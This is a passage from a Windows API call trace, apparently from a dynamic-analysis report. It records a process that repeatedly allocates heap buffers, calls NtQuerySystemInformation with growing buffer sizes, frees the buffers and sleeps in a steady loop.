Flags=0x0, Size=0x90) returned 0x295bd60 [0274.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0274.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0274.771] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0274.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.772] Sleep (dwMilliseconds=0x110) [0274.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0274.786] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.787] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0274.788] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0274.788] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.788] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0274.806] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0274.806] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.807] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0274.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0274.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0274.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.812] Sleep (dwMilliseconds=0x110) [0274.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0274.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0274.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0274.833] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0274.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0274.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0274.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0274.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0274.835] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.835] Sleep (dwMilliseconds=0x110) [0274.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0274.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0274.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0274.849] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0274.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0274.849] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0274.850] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0274.850] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0274.850] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.851] Sleep (dwMilliseconds=0x110) [0274.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0274.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0274.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0274.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0274.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0274.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0274.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0274.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0274.867] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.867] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.867] Sleep (dwMilliseconds=0x110) [0274.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0274.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0274.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0274.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0274.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0274.881] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0274.883] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0274.883] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.884] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0274.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.892] Sleep (dwMilliseconds=0x110) [0274.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0274.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0274.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0274.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0274.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0274.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0274.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0274.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0274.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.924] Sleep (dwMilliseconds=0x110) [0274.945] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0274.945] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.946] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0274.946] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0274.946] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.947] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0274.947] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0274.947] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.948] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0274.948] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0274.948] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.948] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0274.948] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.948] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.953] Sleep (dwMilliseconds=0x110) [0274.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0274.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0274.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0274.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0275.040] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0275.040] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.041] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0275.041] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0275.041] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.042] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0275.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.048] Sleep (dwMilliseconds=0x110) [0275.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0275.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0275.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0275.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0275.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0275.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0275.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0275.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0275.070] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.070] Sleep (dwMilliseconds=0x110) [0275.102] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0275.102] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.102] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0275.102] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0275.102] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.103] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0275.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0275.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0275.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0275.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0275.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.109] Sleep (dwMilliseconds=0x110) [0275.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0275.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0275.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0275.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0275.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0275.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0275.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0275.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0275.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.129] Sleep (dwMilliseconds=0x110) [0275.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0275.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0275.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0275.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0275.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0275.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0275.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0275.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0275.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.144] Sleep (dwMilliseconds=0x110) [0275.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0275.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0275.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0275.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0275.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0275.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0275.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0275.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0275.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.192] Sleep (dwMilliseconds=0x110) [0275.215] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0275.215] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0275.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0275.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.217] HeapFree (in: 